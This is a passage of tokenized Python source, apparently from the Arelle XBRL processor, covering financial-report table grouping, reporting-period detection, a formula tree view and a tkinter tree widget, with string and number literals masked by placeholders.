TABLES or "<STR_LIT>" in tblName and DETAILS or <EOL> ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and POLICIES or UNCATEG ) <EOL> elif tableGroup == TABLES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and DETAILS or <EOL> ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and TABLES or UNCATEG ) <EOL> elif tableGroup == DETAILS : <EOL> tableGroup = ( ( "<STR_LIT>" in tblName or "<STR_LIT>" in tblName ) and DETAILS or UNCATEG ) <EOL> else : <EOL> tableGroup = UNCATEG <EOL> if firstTableLinkroleURI is None and tableGroup == COVER : <EOL> firstTableLinkroleURI = roleType . roleURI <EOL> if tblType == "<STR_LIT>" and not firstDocumentLinkroleURI : <EOL> firstDocumentLinkroleURI = roleType . roleURI <EOL> roleType . _tableIndex = ( tableGroup , seq , tblName ) <EOL> if not modelXbrl . 
qnameDimensionDefaults : <EOL> from arelle import ValidateXbrlDimensions <EOL> ValidateXbrlDimensions . loadDimensionDefaults ( modelXbrl ) <EOL> reportedFacts = set ( ) <EOL> factsByQname = modelXbrl . factsByQname <EOL> reportingPeriods = set ( ) <EOL> nextEnd = None <EOL> deiFact = { } <EOL> for conceptName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> for concept in modelXbrl . nameConcepts [ conceptName ] : <EOL> for fact in factsByQname [ concept . qname ] : <EOL> deiFact [ conceptName ] = fact <EOL> if fact . context is not None : <EOL> reportingPeriods . add ( ( None , fact . context . endDatetime ) ) <EOL> reportingPeriods . add ( ( fact . context . startDatetime , fact . context . endDatetime ) ) <EOL> nextEnd = fact . context . startDatetime <EOL> duration = ( fact . context . endDatetime - fact . context . startDatetime ) . days + <NUM_LIT:1> <EOL> break <EOL> if "<STR_LIT>" in deiFact : <EOL> fact = deiFact [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in fact . xValue : <EOL> endDatetime = fact . context . endDatetime <EOL> endDatetimeMonth = endDatetime . month <EOL> if ( endDatetime + timedelta ( <NUM_LIT:2> ) ) . month != endDatetimeMonth : <EOL> endOfMonth = True <EOL> while endDatetime . month == endDatetimeMonth : <EOL> endDatetime += timedelta ( <NUM_LIT:1> ) <EOL> else : <EOL> endOfMonth = False <EOL> startYr = endDatetime . year <EOL> startMo = endDatetime . month - <NUM_LIT:3> <EOL> if startMo <= <NUM_LIT:0> : <EOL> startMo += <NUM_LIT:12> <EOL> startYr -= <NUM_LIT:1> <EOL> startDatetime = datetime ( startYr , startMo , endDatetime . day , endDatetime . hour , endDatetime . minute , endDatetime . second ) <EOL> if endOfMonth : <EOL> startDatetime -= timedelta ( <NUM_LIT:1> ) <EOL> endDatetime -= timedelta ( <NUM_LIT:1> ) <EOL> reportingPeriods . 
add ( ( startDatetime , endDatetime ) ) <EOL> duration = <NUM_LIT> <EOL> while ( nextEnd is not None ) : <EOL> thisEnd = nextEnd <EOL> prevMaxStart = thisEnd - timedelta ( duration * <NUM_LIT> ) <EOL> prevMinStart = thisEnd - timedelta ( duration * <NUM_LIT> ) <EOL> nextEnd = None <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> if ( cntx . isStartEndPeriod and not cntx . qnameDims and thisEnd == cntx . endDatetime and <EOL> prevMinStart <= cntx . startDatetime <= prevMaxStart ) : <EOL> reportingPeriods . add ( ( None , cntx . endDatetime ) ) <EOL> reportingPeriods . add ( ( cntx . startDatetime , cntx . endDatetime ) ) <EOL> nextEnd = cntx . startDatetime <EOL> break <EOL> elif ( cntx . isInstantPeriod and not cntx . qnameDims and thisEnd == cntx . endDatetime ) : <EOL> reportingPeriods . add ( ( None , cntx . endDatetime ) ) <EOL> stmtReportingPeriods = set ( reportingPeriods ) <EOL> sortedRoleTypes . reverse ( ) <EOL> for i , roleTypes in enumerate ( sortedRoleTypes ) : <EOL> roleDefinition , roleType = roleTypes <EOL> tableFacts = set ( ) <EOL> tableGroup , tableSeq , tableName = roleType . _tableIndex <EOL> roleURIdims , priItemQNames = EFMlinkRoleURIstructure ( modelXbrl , roleType . roleURI ) <EOL> for priItemQName in priItemQNames : <EOL> for fact in factsByQname [ priItemQName ] : <EOL> cntx = fact . context <EOL> if ( cntx is not None and <EOL> all ( dimQn in modelXbrl . qnameDimensionDefaults <EOL> for dimQn in ( roleURIdims . keys ( ) - cntx . qnameDims . keys ( ) ) ) and <EOL> all ( mdlDim . memberQname in roleURIdims [ dimQn ] <EOL> for dimQn , mdlDim in cntx . qnameDims . items ( ) <EOL> if dimQn in roleURIdims ) ) : <EOL> cntxStartDatetime = cntx . startDatetime <EOL> cntxEndDatetime = cntx . endDatetime <EOL> if ( tableGroup != STMTS or <EOL> ( cntxStartDatetime , cntxEndDatetime ) in stmtReportingPeriods and <EOL> ( fact not in reportedFacts or <EOL> all ( dimQn not in cntx . qnameDims <EOL> for dimQn in ( cntx . qnameDims . 
keys ( ) - roleURIdims . keys ( ) ) ) ) ) : <EOL> tableFacts . add ( fact ) <EOL> reportedFacts . add ( fact ) <EOL> roleType . _tableFacts = tableFacts <EOL> closestParentType = None <EOL> closestParentMatchLength = <NUM_LIT:0> <EOL> for _parentRoleDefinition , parentRoleType in sortedRoleTypes [ i + <NUM_LIT:1> : ] : <EOL> matchLen = parentNameMatchLen ( tableName , parentRoleType ) <EOL> if matchLen > closestParentMatchLength : <EOL> closestParentMatchLength = matchLen <EOL> closestParentType = parentRoleType <EOL> if closestParentType is not None : <EOL> closestParentType . _tableChildren . insert ( <NUM_LIT:0> , roleType ) <EOL> unmatchedChildRoles = set ( ) <EOL> longestChildMatchLen = <NUM_LIT:0> <EOL> numChildren = <NUM_LIT:0> <EOL> for childRoleType in roleType . _tableChildren : <EOL> matchLen = parentNameMatchLen ( tableName , childRoleType ) <EOL> if matchLen < closestParentMatchLength : <EOL> unmatchedChildRoles . add ( childRoleType ) <EOL> elif matchLen > longestChildMatchLen : <EOL> longestChildMatchLen = matchLen <EOL> numChildren += <NUM_LIT:1> <EOL> if numChildren > <NUM_LIT:1> : <EOL> for childRoleType in roleType . _tableChildren : <EOL> if ( childRoleType not in unmatchedChildRoles and <EOL> parentNameMatchLen ( tableName , childRoleType ) < longestChildMatchLen ) : <EOL> unmatchedChildRoles . add ( childRoleType ) <EOL> for unmatchedChildRole in unmatchedChildRoles : <EOL> roleType . _tableChildren . remove ( unmatchedChildRole ) <EOL> for childRoleType in roleType . _tableChildren : <EOL> childRoleType . _tableParent = roleType <EOL> unmatchedChildRoles = None <EOL> global UGT_TOPICS <EOL> if UGT_TOPICS is None : <EOL> try : <EOL> from arelle import FileSource <EOL> fh = FileSource . openFileStream ( modelXbrl . modelManager . cntlr , <EOL> os . path . join ( modelXbrl . modelManager . cntlr . configDir , "<STR_LIT>" ) , <EOL> '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) <EOL> UGT_TOPICS = json . load ( fh ) <EOL> fh . 
close ( ) <EOL> for topic in UGT_TOPICS : <EOL> topic [ <NUM_LIT:6> ] = set ( topic [ <NUM_LIT:6> ] ) <EOL> topic [ <NUM_LIT:7> ] = set ( topic [ <NUM_LIT:7> ] ) <EOL> topic [ <NUM_LIT:8> ] = set ( topic [ <NUM_LIT:8> ] ) <EOL> except Exception as ex : <EOL> UGT_TOPICS = None <EOL> if UGT_TOPICS is not None : <EOL> def roleUgtConcepts ( roleType ) : <EOL> roleConcepts = set ( ) <EOL> for rel in modelXbrl . relationshipSet ( XbrlConst . parentChild , roleType . roleURI ) . modelRelationships : <EOL> if rel . toModelObject is not None : <EOL> roleConcepts . add ( rel . toModelObject . name ) <EOL> if rel . fromModelObject is not None : <EOL> roleConcepts . add ( rel . fromModelObject . name ) <EOL> if hasattr ( roleType , "<STR_LIT>" ) : <EOL> for _tableChild in roleType . _tableChildren : <EOL> roleConcepts |= roleUgtConcepts ( _tableChild ) <EOL> return roleConcepts <EOL> topicMatches = { } <EOL> for roleDefinition , roleType in sortedRoleTypes : <EOL> roleTopicType = '<STR_LIT:S>' if roleDefinition . startswith ( '<STR_LIT:S>' ) else '<STR_LIT:D>' <EOL> if getattr ( roleType , "<STR_LIT>" , None ) is None : <EOL> concepts = roleUgtConcepts ( roleType ) <EOL> for i , ugtTopic in enumerate ( UGT_TOPICS ) : <EOL> if ugtTopic [ <NUM_LIT:0> ] == roleTopicType : <EOL> countAbstracts = len ( concepts & ugtTopic [ <NUM_LIT:6> ] ) <EOL> countTextBlocks = len ( concepts & ugtTopic [ <NUM_LIT:7> ] ) <EOL> countLineItems = len ( concepts & ugtTopic [ <NUM_LIT:8> ] ) <EOL> if countAbstracts or countTextBlocks or countLineItems : <EOL> _score = ( <NUM_LIT:10> * countAbstracts + <EOL> <NUM_LIT:1000> * countTextBlocks + <EOL> countLineItems / len ( concepts ) ) <EOL> if i not in topicMatches or _score > topicMatches [ i ] [ <NUM_LIT:0> ] : <EOL> topicMatches [ i ] = ( _score , roleType ) <EOL> for topicNum , scoredRoleType in topicMatches . 
items ( ) : <EOL> _score , roleType = scoredRoleType <EOL> if _score > getattr ( roleType , "<STR_LIT>" , <NUM_LIT:0> ) : <EOL> ugtTopic = UGT_TOPICS [ topicNum ] <EOL> roleType . _tableTopicScore = _score <EOL> roleType . _tableTopicType = ugtTopic [ <NUM_LIT:0> ] <EOL> roleType . _tableTopicName = ugtTopic [ <NUM_LIT:3> ] <EOL> roleType . _tableTopicCode = ugtTopic [ <NUM_LIT:4> ] <EOL> return ( firstTableLinkroleURI or firstDocumentLinkroleURI ) , None <EOL> elif "<STR_LIT>" in modelXbrl . modelManager . disclosureSystem . names : <EOL> roleElrs = dict ( ( roleURI , roleType ) <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ) <EOL> roleIdentifierItems = { } <EOL> for roleURI , roleType in roleElrs . items ( ) : <EOL> roleType . _tableChildren = [ ] <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> for rootConcept in relSet . rootConcepts : <EOL> if rootConcept . substitutionGroupQname and rootConcept . substitutionGroupQname . localName == "<STR_LIT>" : <EOL> roleIdentifierItems [ rootConcept ] = roleType <EOL> linkroleUri = None <EOL> for roleURI , roleType in roleElrs . items ( ) : <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> def addRoleIdentifiers ( fromConcept , parentRoleType , visited ) : <EOL> for rel in relSet . fromModelObject ( fromConcept ) : <EOL> _fromConcept = rel . fromModelObject <EOL> _toConcept = rel . toModelObject <EOL> if isinstance ( _fromConcept , ModelConcept ) and isinstance ( _toConcept , ModelConcept ) : <EOL> _fromSubQn = _fromConcept . substitutionGroupQname <EOL> _toSubQn = _toConcept . substitutionGroupQname <EOL> if ( ( parentRoleType is not None or <EOL> ( _fromSubQn and _fromSubQn . localName == "<STR_LIT>" and _fromConcept in roleIdentifierItems ) ) and <EOL> _toSubQn and _toSubQn . 
localName == "<STR_LIT>" and <EOL> _toConcept in roleIdentifierItems ) : <EOL> if parentRoleType is None : <EOL> parentRoleType = roleIdentifierItems [ _fromConcept ] <EOL> _toRoleType = roleIdentifierItems [ _toConcept ] <EOL> if _toConcept not in parentRoleType . _tableChildren : <EOL> parentRoleType . _tableChildren . append ( _toRoleType ) <EOL> if _toConcept not in visited : <EOL> visited . add ( _toConcept ) <EOL> addRoleIdentifiers ( _toConcept , _toRoleType , visited ) <EOL> visited . discard ( _toConcept ) <EOL> elif _toConcept not in visited : <EOL> visited . add ( _toConcept ) <EOL> addRoleIdentifiers ( _toConcept , parentRoleType , visited ) <EOL> visited . discard ( _toConcept ) <EOL> for rootConcept in relSet . rootConcepts : <EOL> addRoleIdentifiers ( rootConcept , None , set ( ) ) <EOL> if not linkroleUri and len ( roleType . _tableChildren ) > <NUM_LIT:0> : <EOL> linkroleUri = roleURI <EOL> return linkroleUri , linkroleUri <EOL> return None , None <EOL> def parentNameMatchLen ( tableName , parentRoleType ) : <EOL> lengthOfMatch = <NUM_LIT:0> <EOL> parentName = parentRoleType . _tableIndex [ <NUM_LIT:2> ] <EOL> parentNameLen = len ( parentName . partition ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] ) <EOL> fullWordFound = False <EOL> for c in tableName . partition ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] : <EOL> fullWordFound |= c . isspace ( ) <EOL> if lengthOfMatch >= parentNameLen or c != parentName [ lengthOfMatch ] : <EOL> break <EOL> lengthOfMatch += <NUM_LIT:1> <EOL> return fullWordFound and lengthOfMatch <EOL> def EFMlinkRoleURIstructure ( modelXbrl , roleURI ) : <EOL> relSet = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleURI ) <EOL> dimMems = { } <EOL> priItems = set ( ) <EOL> for rootConcept in relSet . 
rootConcepts : <EOL> EFMlinkRoleDescendants ( relSet , rootConcept , dimMems , priItems ) <EOL> return dimMems , priItems <EOL> def EFMlinkRoleDescendants ( relSet , concept , dimMems , priItems ) : <EOL> if concept is not None : <EOL> if concept . isDimensionItem : <EOL> dimMems [ concept . qname ] = EFMdimMems ( relSet , concept , set ( ) ) <EOL> else : <EOL> if not concept . isAbstract : <EOL> priItems . add ( concept . qname ) <EOL> for rel in relSet . fromModelObject ( concept ) : <EOL> EFMlinkRoleDescendants ( relSet , rel . toModelObject , dimMems , priItems ) <EOL> def EFMdimMems ( relSet , concept , memQNames ) : <EOL> for rel in relSet . fromModelObject ( concept ) : <EOL> dimConcept = rel . toModelObject <EOL> if isinstance ( dimConcept , ModelConcept ) and dimConcept . isDomainMember : <EOL> memQNames . add ( dimConcept . qname ) <EOL> EFMdimMems ( relSet , dimConcept , memQNames ) <EOL> return memQNames </s>
<s> '''<STR_LIT>''' <EOL> from arelle import ModelObject , XbrlConst , ViewFile <EOL> from arelle . ModelDtsObject import ModelRelationship <EOL> from arelle . ModelFormulaObject import ModelParameter , ModelVariable , ModelVariableSetAssertion , ModelConsistencyAssertion <EOL> from arelle . ViewUtilFormulae import rootFormulaObjects , formulaObjSortKey <EOL> import os <EOL> def viewFormulae ( modelXbrl , outfile , header , lang = None ) : <EOL> modelXbrl . modelManager . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> view = ViewFormulae ( modelXbrl , outfile , header , lang ) <EOL> view . view ( ) <EOL> view . close ( ) <EOL> class ViewFormulae ( ViewFile . View ) : <EOL> def __init__ ( self , modelXbrl , outfile , header , lang ) : <EOL> super ( ViewFormulae , self ) . __init__ ( modelXbrl , outfile , header , lang ) <EOL> def view ( self ) : <EOL> rootObjects = rootFormulaObjects ( self ) <EOL> self . treeCols = <NUM_LIT:0> <EOL> for rootObject in rootObjects : <EOL> self . treeDepth ( rootObject , <NUM_LIT:1> , set ( ) ) <EOL> self . addRow ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , asHeader = True ) <EOL> for rootObject in sorted ( rootObjects , key = formulaObjSortKey ) : <EOL> self . viewFormulaObjects ( rootObject , None , <NUM_LIT:0> , set ( ) ) <EOL> for cfQnameArity in sorted ( qnameArity <EOL> for qnameArity in self . modelXbrl . modelCustomFunctionSignatures . keys ( ) <EOL> if isinstance ( qnameArity , ( tuple , list ) ) ) : <EOL> cfObject = self . modelXbrl . modelCustomFunctionSignatures [ cfQnameArity ] <EOL> self . viewFormulaObjects ( cfObject , None , <NUM_LIT:0> , set ( ) ) <EOL> def treeDepth ( self , fromObject , indent , visited ) : <EOL> if fromObject is None : <EOL> return <EOL> if indent > self . treeCols : self . treeCols = indent <EOL> if fromObject not in visited : <EOL> visited . add ( fromObject ) <EOL> relationshipArcsShown = set ( ) <EOL> for relationshipSet in ( self . 
varSetFilterRelationshipSet , <EOL> self . allFormulaRelationshipsSet ) : <EOL> for modelRel in relationshipSet . fromModelObject ( fromObject ) : <EOL> if modelRel . arcElement not in relationshipArcsShown : <EOL> relationshipArcsShown . add ( modelRel . arcElement ) <EOL> toObject = modelRel . toModelObject <EOL> self . treeDepth ( toObject , indent + <NUM_LIT:1> , visited ) <EOL> visited . remove ( fromObject ) <EOL> def viewFormulaObjects ( self , fromObject , fromRel , indent , visited ) : <EOL> if fromObject is None : <EOL> return <EOL> if isinstance ( fromObject , ( ModelVariable , ModelParameter ) ) and fromRel is not None : <EOL> text = "<STR_LIT>" . format ( fromObject . localName , fromRel . variableQname ) <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) , "<STR_LIT:name>" : str ( fromRel . variableQname ) } <EOL> elif isinstance ( fromObject , ( ModelVariableSetAssertion , ModelConsistencyAssertion ) ) : <EOL> text = "<STR_LIT>" . format ( fromObject . localName , fromObject . id ) <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) , "<STR_LIT:id>" : str ( fromObject . id ) } <EOL> else : <EOL> text = fromObject . localName <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) } <EOL> cols = [ text , fromObject . xlinkLabel ] <EOL> if fromRel is not None and fromRel . elementQname == XbrlConst . qnVariableFilterArc : <EOL> cols . append ( "<STR_LIT:true>" if fromRel . isCovered else "<STR_LIT:false>" ) <EOL> cols . append ( "<STR_LIT:true>" if fromRel . isComplemented else "<STR_LIT:false>" ) <EOL> else : <EOL> cols . append ( None ) <EOL> cols . append ( None ) <EOL> if isinstance ( fromObject , ModelVariable ) : <EOL> cols . append ( fromObject . bindAsSequence ) <EOL> else : <EOL> cols . append ( None ) <EOL> if hasattr ( fromObject , "<STR_LIT>" ) : <EOL> cols . append ( fromObject . viewExpression ) <EOL> else : <EOL> cols . append ( None ) <EOL> self . 
addRow ( cols , treeIndent = indent , xmlRowElementName = "<STR_LIT>" , xmlRowEltAttr = xmlRowEltAttr , xmlCol0skipElt = True ) <EOL> if fromObject not in visited : <EOL> visited . add ( fromObject ) <EOL> relationshipArcsShown = set ( ) <EOL> for relationshipSet in ( self . varSetFilterRelationshipSet , <EOL> self . allFormulaRelationshipsSet ) : <EOL> for modelRel in relationshipSet . fromModelObject ( fromObject ) : <EOL> if modelRel . arcElement not in relationshipArcsShown : <EOL> relationshipArcsShown . add ( modelRel . arcElement ) <EOL> toObject = modelRel . toModelObject <EOL> self . viewFormulaObjects ( toObject , modelRel , indent + <NUM_LIT:1> , visited ) <EOL> visited . remove ( fromObject ) </s>
<s> '''<STR_LIT>''' <EOL> from tkinter import * <EOL> try : <EOL> from tkinter . ttk import * <EOL> except ImportError : <EOL> from ttk import * <EOL> from arelle . CntlrWinTooltip import ToolTip <EOL> import os <EOL> class ViewTree : <EOL> def __init__ ( self , modelXbrl , tabWin , tabTitle , hasToolTip = False , lang = None ) : <EOL> self . tabWin = tabWin <EOL> self . viewFrame = Frame ( tabWin ) <EOL> self . viewFrame . view = self <EOL> self . viewFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> tabWin . add ( self . viewFrame , text = tabTitle ) <EOL> self . tabTitle = tabTitle <EOL> vScrollbar = Scrollbar ( self . viewFrame , orient = VERTICAL ) <EOL> hScrollbar = Scrollbar ( self . viewFrame , orient = HORIZONTAL ) <EOL> self . treeView = Treeview ( self . viewFrame , xscrollcommand = hScrollbar . set , yscrollcommand = vScrollbar . set ) <EOL> self . treeView . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> if modelXbrl . modelManager . cntlr . isMac or modelXbrl . modelManager . cntlr . isMSW : <EOL> highlightColor = "<STR_LIT>" % self . treeView . winfo_rgb ( "<STR_LIT>" ) <EOL> else : <EOL> highlightColor = "<STR_LIT>" <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeViewSelection = ( ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . viewSelectionChange , '<STR_LIT:+>' ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . onViewClick , '<STR_LIT:+>' ) <EOL> hScrollbar [ "<STR_LIT>" ] = self . treeView . 
xview <EOL> hScrollbar . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = ( E , W ) ) <EOL> vScrollbar [ "<STR_LIT>" ] = self . treeView . yview <EOL> vScrollbar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = ( N , S ) ) <EOL> self . viewFrame . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . viewFrame . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . modelXbrl = modelXbrl <EOL> self . hasToolTip = hasToolTip <EOL> self . toolTipText = StringVar ( ) <EOL> if hasToolTip : <EOL> self . treeView . bind ( "<STR_LIT>" , self . motion , '<STR_LIT:+>' ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . leave , '<STR_LIT:+>' ) <EOL> self . toolTipText = StringVar ( ) <EOL> self . toolTip = ToolTip ( self . treeView , <EOL> textvariable = self . toolTipText , <EOL> wraplength = <NUM_LIT> , <EOL> follow_mouse = True , <EOL> state = "<STR_LIT>" ) <EOL> self . toolTipColId = None <EOL> self . toolTipRowId = None <EOL> self . modelXbrl = modelXbrl <EOL> self . lang = lang <EOL> self . labelrole = None <EOL> self . nameIsPrefixed = False <EOL> if modelXbrl : <EOL> modelXbrl . views . append ( self ) <EOL> if not lang : <EOL> self . lang = modelXbrl . modelManager . defaultLang <EOL> def clearTreeView ( self ) : <EOL> self . treeViewSelection = ( ) <EOL> for node in self . treeView . get_children ( ) : <EOL> self . treeView . delete ( node ) <EOL> def viewSelectionChange ( self , event = None ) : <EOL> for node in self . treeViewSelection : <EOL> if self . treeView . exists ( node ) : <EOL> priorTags = self . treeView . item ( node ) [ "<STR_LIT>" ] <EOL> if priorTags : <EOL> priorBgTag = priorTags [ <NUM_LIT:0> ] <EOL> if priorBgTag . startswith ( "<STR_LIT>" ) : <EOL> self . treeView . item ( node , tags = ( priorBgTag [ <NUM_LIT:9> : ] , ) ) <EOL> self . treeViewSelection = self . treeView . selection ( ) <EOL> for node in self . treeViewSelection : <EOL> priorTags = self . treeView . 
item ( node ) [ "<STR_LIT>" ] <EOL> if priorTags : <EOL> self . treeView . item ( node , tags = ( "<STR_LIT>" + priorTags [ <NUM_LIT:0> ] , ) ) <EOL> def onViewClick ( self , * args ) : <EOL> self . modelXbrl . modelManager . cntlr . currentView = self <EOL> def close ( self ) : <EOL> del self . viewFrame . view <EOL> if self . modelXbrl : <EOL> self . tabWin . forget ( self . viewFrame ) <EOL> self . modelXbrl . views . remove ( self ) <EOL> self . modelXbrl = None <EOL> self . view = None <EOL> def select ( self ) : <EOL> self . tabWin . select ( self . viewFrame ) <EOL> def leave ( self , * args ) : <EOL> self . toolTipColId = None <EOL> self . toolTipRowId = None <EOL> def motion ( self , * args ) : <EOL> tvColId = self . treeView . identify_column ( args [ <NUM_LIT:0> ] . x ) <EOL> tvRowId = self . treeView . identify_row ( args [ <NUM_LIT:0> ] . y ) <EOL> if tvColId != self . toolTipColId or tvRowId != self . toolTipRowId : <EOL> self . toolTipColId = tvColId <EOL> self . toolTipRowId = tvRowId <EOL> newValue = self . getToolTip ( tvRowId , tvColId ) <EOL> if newValue is None and tvRowId and len ( tvRowId ) > <NUM_LIT:0> : <EOL> try : <EOL> col = int ( tvColId [ <NUM_LIT:1> : ] ) <EOL> if col == <NUM_LIT:0> : <EOL> newValue = self . treeView . item ( tvRowId , "<STR_LIT:text>" ) <EOL> else : <EOL> values = self . treeView . item ( tvRowId , "<STR_LIT>" ) <EOL> if col <= len ( values ) : <EOL> newValue = values [ col - <NUM_LIT:1> ] <EOL> except ValueError : <EOL> pass <EOL> self . setToolTip ( newValue , tvColId ) <EOL> def getToolTip ( self , rowId , colId ) : <EOL> return None <EOL> def setToolTip ( self , text , colId = "<STR_LIT>" ) : <EOL> self . toolTip . _hide ( ) <EOL> if isinstance ( text , str ) and len ( text ) > <NUM_LIT:0> : <EOL> width = self . treeView . column ( colId , "<STR_LIT:width>" ) <EOL> if len ( text ) * <NUM_LIT:8> > width or '<STR_LIT:\n>' in text : <EOL> self . toolTipText . set ( text ) <EOL> self . toolTip . 
configure ( state = "<STR_LIT>" ) <EOL> self . toolTip . _schedule ( ) <EOL> else : <EOL> self . toolTipText . set ( "<STR_LIT>" ) <EOL> self . toolTip . configure ( state = "<STR_LIT>" ) <EOL> else : <EOL> self . toolTipText . set ( "<STR_LIT>" ) <EOL> self . toolTip . configure ( state = "<STR_LIT>" ) <EOL> def contextMenu ( self ) : <EOL> try : <EOL> return self . menu <EOL> except AttributeError : <EOL> try : <EOL> self . menu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . treeView . bind ( self . modelXbrl . modelManager . cntlr . contextMenuClick , self . popUpMenu , '<STR_LIT:+>' ) <EOL> return self . menu <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> return None <EOL> def popUpMenu ( self , event ) : <EOL> if self . menu : <EOL> self . menuRow = self . treeView . identify_row ( event . y ) <EOL> self . menuCol = self . treeView . identify_column ( event . x ) <EOL> self . menu . post ( event . x_root , event . y_root ) <EOL> def expand ( self ) : <EOL> self . setTreeItemOpen ( self . menuRow , open = True ) <EOL> def expandAll ( self ) : <EOL> self . setTreeItemOpen ( "<STR_LIT>" , open = True ) <EOL> def collapse ( self ) : <EOL> self . setTreeItemOpen ( self . menuRow , open = False ) <EOL> def collapseAll ( self ) : <EOL> self . setTreeItemOpen ( "<STR_LIT>" , open = False ) <EOL> def setTreeItemOpen ( self , node , open = True ) : <EOL> if node : <EOL> self . treeView . item ( node , open = open ) <EOL> for childNode in self . treeView . get_children ( node ) : <EOL> self . setTreeItemOpen ( childNode , open ) <EOL> def menuAddExpandCollapse ( self ) : <EOL> if self . menu : <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . expand ) <EOL> self . menu . 
add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . collapse ) <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . expandAll ) <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . collapseAll ) <EOL> def menuAddClipboard ( self ) : <EOL> if self . menu and self . modelXbrl . modelManager . cntlr . hasClipboard : <EOL> try : <EOL> clipboardMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyCellToClipboard ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyRowToClipboard ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyTableToClipboard ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = clipboardMenu , underline = <NUM_LIT:0> ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddLangs ( self ) : <EOL> if self . menu : <EOL> try : <EOL> langsMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = langsMenu , underline = <NUM_LIT:0> ) <EOL> for lang in sorted ( self . modelXbrl . langs ) : <EOL> langsMenu . add_command ( label = lang , underline = <NUM_LIT:0> , command = lambda l = lang : self . setLang ( l ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . 
menu = None <EOL> def menuAddLabelRoles ( self , includeConceptName = False , menulabel = None ) : <EOL> if self . menu : <EOL> try : <EOL> if menulabel is None : menulabel = _ ( "<STR_LIT>" ) <EOL> rolesMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = menulabel , menu = rolesMenu , underline = <NUM_LIT:0> ) <EOL> from arelle . ModelRelationshipSet import labelroles <EOL> for x in labelroles ( self . modelXbrl , includeConceptName ) : <EOL> rolesMenu . add_command ( label = x [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] , underline = <NUM_LIT:0> , command = lambda a = x [ <NUM_LIT:1> ] : self . setLabelrole ( a ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddNameStyle ( self , menulabel = None ) : <EOL> if self . menu : <EOL> try : <EOL> if menulabel is None : menulabel = _ ( "<STR_LIT>" ) <EOL> nameStyleMenu = Menu ( self . viewFrame , 